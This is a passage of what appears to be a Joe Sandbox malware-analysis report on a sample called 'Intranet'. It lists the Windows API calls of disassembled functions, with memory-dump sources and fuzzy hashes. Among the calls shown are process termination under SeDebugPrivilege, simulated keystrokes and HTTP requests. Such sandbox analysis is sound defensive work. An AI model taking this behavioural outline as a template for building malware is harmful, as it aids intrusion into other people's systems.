                                                                              • Part of subcall function 00512B4F: SetEvent.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 94c70aac56711d7a5ec9b3dd2421ca8ea03da8a7e3a79e02ec02b8b4c5040595
                                                                            • Instruction ID: efa926cf2db8ffa7c1e43454e26fd462b0a0de77ff161147f8b09edcbd33471a
                                                                            • Opcode Fuzzy Hash: 94c70aac56711d7a5ec9b3dd2421ca8ea03da8a7e3a79e02ec02b8b4c5040595
                                                                            • Instruction Fuzzy Hash: C4415BB5541209BFFB129F50CC89FFE7BACFB08354F00411AFA159A281D770AE949BA1
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00530980), ref: 00519412
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00530980), ref: 00519446
                                                                            • #164.OLEAUT32(?,?,?,?,?,?,00530980), ref: 005195C0
                                                                            • #6.OLEAUT32(?,?,?,00530980), ref: 005195EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #164FileFreeLibraryModuleName
                                                                            • String ID:
                                                                            • API String ID: 2716333841-0
                                                                            • Opcode ID: 4102c100eaa8c70395afbb20772553f23accd2985d92f8ecf7cb2aeeaf4ae40f
                                                                            • Instruction ID: 7598bf049b1a160554cc3f7085a61373469f710f6dcda512fcf065a3bd65d553
                                                                            • Opcode Fuzzy Hash: 4102c100eaa8c70395afbb20772553f23accd2985d92f8ecf7cb2aeeaf4ae40f
                                                                            • Instruction Fuzzy Hash: E5F13975A00209EFDB04DF94C894EEEBBB9FF85314F108459F516AB291DB31AE85CB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0051FD9E
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF31
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF55
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF95
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051FFB7
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00520133
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00520165
                                                                            • CloseHandle.KERNEL32(?), ref: 00520194
                                                                            • CloseHandle.KERNEL32(?), ref: 0052020B
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: c1d78f4dfd26564e6c737689f934c802844f62ebaf46f05becb1f1ffc890e2c4
                                                                            • Instruction ID: 3a22e9e0f7cefed1cda42d5fd6bcf4631169205b3bbf34969cb66b8d79846bbd
                                                                            • Opcode Fuzzy Hash: c1d78f4dfd26564e6c737689f934c802844f62ebaf46f05becb1f1ffc890e2c4
                                                                            • Instruction Fuzzy Hash: ADE199312043019FD714EF25C895A6EBBE5BF86314F14892EF8899B2E2CB74EC45CB56
                                                                            APIs
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00503B8A,?), ref: 00504BE0
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00503B8A,?), ref: 00504BF9
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 005052FB
                                                                            • _wcscmp.LIBCMT ref: 00505315
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00505330
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: ceae2e1d09a32dfac0fb1bce64b3465855d4391ffceeccb297641e737f57b4b3
                                                                            • Instruction ID: f5d75950722fc44cabd2d145ea5daa2666f9d2b83a7bbd11be914b3f92afabf2
                                                                            • Opcode Fuzzy Hash: ceae2e1d09a32dfac0fb1bce64b3465855d4391ffceeccb297641e737f57b4b3
                                                                            • Instruction Fuzzy Hash: 005184B24087855BC764DBA0D891DDFB7ECAF84300F50491FF689D3192EF74A6888B66
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00528D24
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: ea534e9eedb4bdd1f93eee048f31b63c10b31942ba4aa43fb4a944c42690a744
                                                                            • Instruction ID: 4d6efc703092296306e487d2ccd031bf58dffe1a1c36cc1458e80faf352f76bc
                                                                            • Opcode Fuzzy Hash: ea534e9eedb4bdd1f93eee048f31b63c10b31942ba4aa43fb4a944c42690a744
                                                                            • Instruction Fuzzy Hash: 0151C130603224BFEB259FA8EC89B793F64BF16314F240516F614EB1E1CB71AD94DA50
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004DC638
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004DC65A
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004DC672
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004DC690
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004DC6B1
                                                                            • DestroyIcon.USER32(00000000), ref: 004DC6C0
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004DC6DD
                                                                            • DestroyIcon.USER32(?), ref: 004DC6EC
                                                                              • Part of subcall function 0052AAD4: DeleteObject.GDI32(00000000,?,?,?,004A2FDC,00000000), ref: 0052AB0D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2819616528-0
                                                                            • Opcode ID: 3cccc487972044aeba4c8cfedbb5d3fe1aa9a8d0f0b02a32e42f1b50dfd83dae
                                                                            • Instruction ID: 06f9b159542ec76c320100d6125f68031f4a03e83f04d1451c1528a7323f96cd
                                                                            • Opcode Fuzzy Hash: 3cccc487972044aeba4c8cfedbb5d3fe1aa9a8d0f0b02a32e42f1b50dfd83dae
                                                                            • Instruction Fuzzy Hash: F951AC7060020AAFDB20DF28CD95BAA7BB5FB69710F10052AF902973D0D7B4ED50EB54
                                                                            APIs
                                                                              • Part of subcall function 004FB52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,004FA23B,?,00000001), ref: 004FB54D
                                                                              • Part of subcall function 004FB52D: GetCurrentThreadId.KERNEL32 ref: 004FB554
                                                                              • Part of subcall function 004FB52D: AttachThreadInput.USER32(00000000,?,004FA23B,?,00000001), ref: 004FB55B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 004FA246
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 004FA263
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004FA266
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000025,00000000,?,00000001), ref: 004FA26F
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000,?,00000001), ref: 004FA28D
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA290
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA299
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA2B0
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA2B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: c318e06eb98443bde24bd634c5584aa1fddc7fec990a552e08d49f630765a17b
                                                                            • Instruction ID: 2664db6c116251d1da270f7fe470a00178fc45baf3b2d5bc6f3567a650fd5e0b
                                                                            • Opcode Fuzzy Hash: c318e06eb98443bde24bd634c5584aa1fddc7fec990a552e08d49f630765a17b
                                                                            • Instruction Fuzzy Hash: 0511C2B1650618BEFA106B619C4AF7A3A1DEB4C754F111419F344AB2D0CAF65C50EAA4
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004F915A,00000B00,?,?), ref: 004F94E2
                                                                            • HeapAlloc.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F94E9
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F915A,00000B00,?,?), ref: 004F94FE
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,004F915A,00000B00,?,?), ref: 004F9506
                                                                            • DuplicateHandle.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F9509
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004F915A,00000B00,?,?), ref: 004F9519
                                                                            • GetCurrentProcess.KERNEL32(004F915A,00000000,?,004F915A,00000B00,?,?), ref: 004F9521
                                                                            • DuplicateHandle.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F9524
                                                                            • CreateThread.KERNEL32(00000000,00000000,004F954A,00000000,00000000,00000000), ref: 004F953E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: e9199f54e04ab6a0f10d1281fd4aff572add9f523683b768b61a04af6536a0d6
                                                                            • Instruction ID: 738aaf0d391c330c1a75f8dd021e0da5da73841c6592b5627982a0dfef3403a3
                                                                            • Opcode Fuzzy Hash: e9199f54e04ab6a0f10d1281fd4aff572add9f523683b768b61a04af6536a0d6
                                                                            • Instruction Fuzzy Hash: A101BBB5240308BFE750ABA5DC5DF6B7BACEB99711F105411FA05DB2E1CA74D804DB20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 976b56139a2a021fdaf4c6f116a35842d23941f65a48c3244b92f8e36fd6e363
                                                                            • Instruction ID: 1c3afeb91c535700a727d5da359a215ace8d7844c7a3a17af72f0f28acd86b12
                                                                            • Opcode Fuzzy Hash: 976b56139a2a021fdaf4c6f116a35842d23941f65a48c3244b92f8e36fd6e363
                                                                            • Instruction Fuzzy Hash: 60C1B271A0121A9FEF11DF98C884BEEBBF5FB48314F158429E915AB281E770AD84CB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2102423945-625585964
                                                                            • Opcode ID: 469452037ac6403cc0c4cf6798576765a56c55a7bc7e3c3becab77fa0a1eaa7d
                                                                            • Instruction ID: 0890fe2438f09c39e5e83f89e81846f84fe3457f10b7f57d2e6f31f9af4a26b6
                                                                            • Opcode Fuzzy Hash: 469452037ac6403cc0c4cf6798576765a56c55a7bc7e3c3becab77fa0a1eaa7d
                                                                            • Instruction Fuzzy Hash: 45916F71A00219ABEF24DFA5C864FEEBBB8FF85710F10855EF515AB240D7709985CBA0
                                                                            APIs
                                                                              • Part of subcall function 004F7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?,?,004F8073), ref: 004F7D45
                                                                              • Part of subcall function 004F7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D60
                                                                              • Part of subcall function 004F7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D6E
                                                                              • Part of subcall function 004F7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?), ref: 004F7D7E
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00519EF0
                                                                            • _memset.LIBCMT ref: 00519EFD
                                                                            • _memset.LIBCMT ref: 0051A040
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 0051A06C
                                                                            • CoTaskMemFree.OLE32(?), ref: 0051A077
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0051A0C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 7f81a0d907ed8a8c19bf373a1f98472b2164bbd60972484e503b2f9c95b26077
                                                                            • Instruction ID: 7829baa0bd4b6987248c8072d0e7bc5914d6c177247b1aa74e6cb59cc4a2781a
                                                                            • Opcode Fuzzy Hash: 7f81a0d907ed8a8c19bf373a1f98472b2164bbd60972484e503b2f9c95b26077
                                                                            • Instruction Fuzzy Hash: 0E914771D00229EBDB11DFA1D895EDEBBB8FF08310F10815AF519A7291DB759A84CFA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010,?,?,SysListView32,00530980,00000000,?,?,?,?,?,?,00000000), ref: 00527449
                                                                            • SendMessageW.USER32(?,00001036,00000000,?,?,?,SysListView32,00530980,00000000,?,?,?,?,?,?,00000000), ref: 0052745D
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00527477
                                                                            • _wcscat.LIBCMT ref: 005274D2
                                                                            • SendMessageW.USER32(?,00001057,00000000,?,?,?,005677C4), ref: 005274E9
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00527517
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window_wcscat
                                                                            • String ID: SysListView32
                                                                            • API String ID: 307300125-78025650
                                                                            • Opcode ID: 893b30f0a3369b0d77d9fa90441cc3528a1196aed71c9d43f06758a4d2f7c23e
                                                                            • Instruction ID: fbea105d1b499c44f3848daba75a6db9e24392833ca1addcf6d87dc3620f436a
                                                                            • Opcode Fuzzy Hash: 893b30f0a3369b0d77d9fa90441cc3528a1196aed71c9d43f06758a4d2f7c23e
                                                                            • Instruction Fuzzy Hash: FA419F71A04318AFEB21DF64DC85BEEBBA8FF09354F10442AF984A72D1D6B19D849B50
                                                                            APIs
                                                                              • Part of subcall function 00504148: CreateToolhelp32Snapshot.KERNEL32 ref: 0050416D
                                                                              • Part of subcall function 00504148: Process32FirstW.KERNEL32(00000000,?), ref: 0050417B
                                                                              • Part of subcall function 00504148: CloseHandle.KERNEL32(00000000), ref: 00504245
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051F08D
                                                                            • GetLastError.KERNEL32 ref: 0051F0A0
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051F0CF
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0051F14C
                                                                            • GetLastError.KERNEL32(00000000), ref: 0051F157
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0051F18C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            • Opcode ID: ea2681aaea18d749cd7e7354d8d2014871b11c3519bc4951e81a1c4b5347eb82
                                                                            • Instruction ID: 3532ada3525da0849ed8c1fa742e289c773e6250c3cb9c2a8e033e372e43e9b1
                                                                            • Opcode Fuzzy Hash: ea2681aaea18d749cd7e7354d8d2014871b11c3519bc4951e81a1c4b5347eb82
                                                                            • Instruction Fuzzy Hash: 5341B131240301AFD711EF25CC95FADBBA5AF94718F04841DF9465B3D2CBB8A848CB99
                                                                            APIs
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104,00567A2C,00567890), ref: 004F0C5B
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • _memset.LIBCMT ref: 004B5787
                                                                            • _wcscpy.LIBCMT ref: 004B57DB
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?,00000080), ref: 004B57EB
                                                                            • __swprintf.LIBCMT ref: 004F0CD1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
